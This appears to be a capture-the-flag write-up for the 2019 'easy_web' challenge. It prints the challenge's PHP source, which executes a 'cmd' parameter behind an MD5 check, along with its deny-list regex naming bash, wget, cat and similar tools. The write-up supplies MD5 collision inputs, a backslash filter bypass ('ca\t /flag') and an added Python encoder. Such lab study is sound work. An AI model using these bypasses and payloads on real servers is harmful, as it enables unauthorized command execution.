[安洵杯 2019]easy_web

Posted on 2022-2-12 14:35:42
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>The challenge opens as follows: ?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=. At the same time, view the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" here, which suggests this challenge is most likely about MD5.</p>
<p>Then I captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode that string once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one decode it still looks like base64, so decode it once more.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decode it, which gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>Then enter it in the address bar.</p>
<p>Then view the page source and decode the base64 string found in it:</p>
<div class="cnblogs_code">
<pre>&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?&gt;
&lt;html&gt;
&lt;style&gt;
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
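<p>As an added example (not code from the original post), the img transform in Python: it decodes the URL value from the page back to 555.png, rebuilds the value for index.php, and mirrors the two checks the PHP source applies to the decoded name (the character strip and the /flag/i refusal). The function names are mine, not the challenge's.</p>

```python
import base64
import binascii
import re

# Values taken from the writeup: the img parameter from the challenge URL and
# the value the writeup derives for index.php.
IMG_PARAM = "TXpVek5UTTFNbVUzTURabE5qYz0"
INDEX_PARAM = "TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"


def _b64decode_lenient(data: bytes) -> bytes:
    """PHP's base64_decode accepts missing '=' padding; restore it before decoding."""
    return base64.b64decode(data + b"=" * (-len(data) % 4))


def decode_img(param: str) -> str:
    """Undo the server transform: hex2bin(base64_decode(base64_decode($_GET['img'])))."""
    inner = _b64decode_lenient(_b64decode_lenient(param.encode()))
    return binascii.unhexlify(inner).decode()


def encode_img(filename: str) -> str:
    """Produce an img value in the server's format: base64(base64(hex(filename))).

    Trailing '=' is dropped, matching the unpadded value seen in the challenge URL.
    """
    hexed = binascii.hexlify(filename.encode())
    return base64.b64encode(base64.b64encode(hexed)).decode().rstrip("=")


def resolve_file(param: str):
    """Mirror the two PHP checks applied after decoding (helper name is mine).

    preg_replace("/[^a-zA-Z0-9.]+/", "", $file) strips everything except letters,
    digits and dots (so a '/' in the name disappears), and preg_match("/flag/i", $file)
    refuses any name mentioning 'flag'. Returns the filename the server would read,
    or None where the PHP dies with "xixi~ no flag".
    """
    name = re.sub(r"[^a-zA-Z0-9.]+", "", decode_img(param))
    if re.search(r"flag", name, re.IGNORECASE):
        return None
    return name
```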
<p>Combined with the earlier inference, the key code is</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This MD5 check is an MD5 strong collision.</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>This is all it takes for the content of cmd to be handled as a command.</p>
<p>So the payload used is:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because '\' is not blocked, it can be bypassed this way.</p>
<p>ls and l\s give the same result when the command executes.</p>
<p>Then I found /flag in the root directory.</p>
<p>So the payload:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since it does not block sort and dir,</p>
<p>listing can also be done with dir in place of ls, and cat can be replaced by sort.</p>